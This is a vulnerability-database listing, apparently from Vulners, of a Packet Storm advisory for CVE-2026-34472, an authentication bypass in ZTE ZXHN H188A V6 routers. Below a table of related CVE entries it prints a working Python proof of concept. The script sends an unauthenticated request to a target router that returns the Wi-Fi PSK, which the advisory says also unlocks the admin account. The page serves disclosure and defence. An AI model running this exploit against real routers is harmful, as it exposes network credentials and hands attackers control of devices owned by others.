Lucene search
K

📄 ZTE ZXHN H188A 6 Authentication Bypass / Credential Disclosure

🗓️ 20 May 2026 00:00:00Reported by Mina Nageh SalalmaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 105 Views

Unauthenticated requests bypass QuickSetupEnable on ZTE ZXHN H188A V6, exposing WLAN PSKs, SSIDs and PPPoE usernames.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-34472
30 Mar 202600:00
attackerkb
Circl
CVE-2026-34472
27 Mar 202623:26
circl
CNNVD
ZTE ZXHN H188A 安全漏洞
30 Mar 202600:00
cnnvd
CVE
CVE-2026-34472
30 Mar 202600:00
cve
Cvelist
CVE-2026-34472
30 Mar 202600:00
cvelist
Exploit DB
ZTE ZXHN H188A V6 - Authentication Bypass
29 May 202600:00
exploitdb
EUVD
EUVD-2026-17107
30 Mar 202618:31
euvd
NVD
CVE-2026-34472
30 Mar 202616:16
nvd
Packet Storm
📄 ZTE ZXHN H188A V6 Authentication Bypass
26 May 202600:00
packetstorm
Positive Technologies
PT-2026-29045
30 Mar 202600:00
ptsecurity
Rows per page
# Title: ZTE ZXHN H188A V6 - Authentication Bypass via Pre-Login Wizard
    Credential Leak
    # Date: 2026-05-20
    # Author: Mina Nageh Salalma (Monx Research)
    # CVE: CVE-2026-34472
    # Vendor: ZTE Corporation
    # Affected: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE
    # Category: Remote / Webapps
    
    # Description:
    # Unauthenticated requests with _type parameter bypass the QuickSetupEnable
    # gate, exposing wizard handlers that return WLAN PSKs, SSIDs, PPPoE
    usernames.
    # Leaked Wi-Fi PSK == admin password after uppercasing = full auth bypass.
    #
    # MITRE: https://www.cve.org/CVERecord?id=CVE-2026-34472
    # Write-up:
    https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router
    
    # PoC:
    import requests
    data = {"IF_ACTION": "getPassword", "_InstID_PASS": "DEV.WIFI.AP1.PSK1",
    "PASSTYPE": "PSK"}
    params = {"_type": "loginData", "_tag": "login_entry"}
    r = requests.post("http://TARGET_IP/", params=params, data=data,
    timeout=10, verify=False)
    print(r.text[:2000])

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation